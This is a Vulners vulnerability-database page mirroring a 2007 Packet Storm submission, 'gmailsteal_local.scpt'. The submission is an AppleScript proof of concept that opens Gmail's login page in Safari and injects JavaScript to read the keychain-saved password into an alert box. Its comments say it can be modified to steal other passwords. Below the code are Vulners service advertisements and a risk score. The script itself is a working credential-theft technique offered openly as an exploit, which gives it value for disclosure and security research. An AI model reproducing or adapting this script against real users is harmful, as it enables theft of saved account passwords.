Lucene search
K

gmailsteal_local.scpt.txt

🗓️ 30 Sep 2007 00:00:00Reported by poplixType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 23 Views

This script steals Gmail passwords using Safar

Code
`-- This script can be used to steal gmail's keychained password by injecting   
-- Javascripts into Safari. When executed it opens gmail's login page, reads  
-- saved password and prompts it into an alert box.  
-- It can be easly modified to steal other pass.   
  
-- poplix papuasia.org -- http://px.dynalias.org -- 09-22-2007  
  
  
  
  
--Stealing code  
set JSTEAL to "alert(document.getElementById('gaia_loginform').Passwd.value)"  
  
  
--Open gmail login page   
tell application "Safari"  
open location "https://www.google.com/accounts/ServiceLogin?service=mail"  
end tell  
  
--Wait loading...  
delay 10  
  
  
--Print out password  
tell application "Safari"  
do JavaScript JSTEAL in document 1  
end tell  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Sep 2007 00:00Current
7.4High risk
Vulners AI Score7.4
23